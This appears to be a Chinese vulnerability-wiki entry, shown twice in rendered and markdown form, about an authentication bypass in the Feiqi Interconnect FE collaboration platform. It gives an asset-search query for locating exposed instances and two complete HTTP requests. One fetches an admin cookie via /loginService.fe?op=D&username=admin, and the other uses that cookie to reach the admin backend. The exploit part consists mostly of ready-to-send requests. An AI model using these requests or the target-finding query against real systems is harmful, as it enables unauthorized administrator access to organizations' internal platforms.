fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台存在身份认证绕过漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。广东飞企互联科技股份有限公司企业运营管理平台存在登录绕过漏洞

二、影响版本

广东飞企互联科技股份有限公司企业运营管理平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

获取cookie

GET /loginService.fe?op=D&username=admin HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

使用获取的cookie登录后台

GET /main/main.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: {cookie}
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/hpq84s22zafgayle

# 飞企互联FE业务协作平台存在身份认证绕过漏洞

# 一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。广东飞企互联科技股份有限公司企业运营管理平台存在登录绕过漏洞

# 二、影响版本

- 广东飞企互联科技股份有限公司企业运营管理平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/VYvXLfPNNC7SvsDq/1692266465639-4e39b2e2-11b3-413b-a119-1c569b2deb21-114442.png)

# 四、漏洞复现

1. 获取cookie
```
GET /loginService.fe?op=D&username=admin HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
![image.png](./img/VYvXLfPNNC7SvsDq/1702460481750-a9da7c88-f35c-41a7-a581-d291630595e8-983251.png)

2. 使用获取的cookie登录后台
```
GET /main/main.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: {cookie}
Upgrade-Insecure-Requests: 1
```
![image.png](./img/VYvXLfPNNC7SvsDq/1702460565513-f24e6c3e-6e80-4bfd-9faf-3465b6c56c0a-104988.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hpq84s22zafgayle>